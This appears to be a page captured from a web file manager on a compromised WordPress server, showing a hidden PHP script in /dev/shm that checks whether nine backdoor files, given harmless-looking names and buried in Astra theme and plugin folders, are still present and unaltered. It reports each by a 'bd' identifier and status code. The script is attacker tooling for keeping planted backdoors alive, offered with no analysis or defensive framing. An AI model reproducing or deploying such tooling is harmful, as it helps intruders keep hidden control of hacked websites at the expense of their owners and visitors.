Viewing File: /dev/shm/.pointer

<?php   $r = '/home/houscjmf/techinverse.net'; $x = ["/wp-content/themes/astra/inc/builder/type/header/below-header/dynamic-css/toxmlrpc.inc.php"=>"bd@@320536@@885",
"/wp-content/plugins/astra-sites/inc/lib/onboarding/assets/src/steps/customize-site/customize-steps/site-colors-typography/session_start.php"=>"bd@@359972@@955",
"/wp-content/plugins/astra-sites/inc/lib/onboarding/assets/src/components/util/next-step-link/tipo_menu_upload.php"=>"bd@@359990@@612",
"/wp-content/plugins/astra-sites/inc/lib/onboarding/assets/src/components/util/next-step-button/listmodules.php"=>"bd@@360003@@694",
"/wp-content/plugins/astra-sites/inc/lib/onboarding/assets/src/components/toggle-switch/lang_es.php"=>"bd@@345442@@954",
"/wp-content/themes/astra/inc/builder/type/header/primary-header/dynamic-css/tinyconfig.php"=>"bd@@360043@@587",
"/wp-content/themes/astra/inc/builder/type/footer/below-footer/dynamic-css/binlog.lib.php"=>"bd@@360048@@929",
"/wp-content/plugins/astra-sites/inc/lib/ai-builder/inc/assets/src/router/sqlupdate2.php"=>"bd@@345581@@710",
"/wp-content/plugins/astra-sites/admin/bsf-analytics/modules/deactivation-survey/classes/index.class.php"=>"bd@@338017@@903"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 
Back to Directory File Manager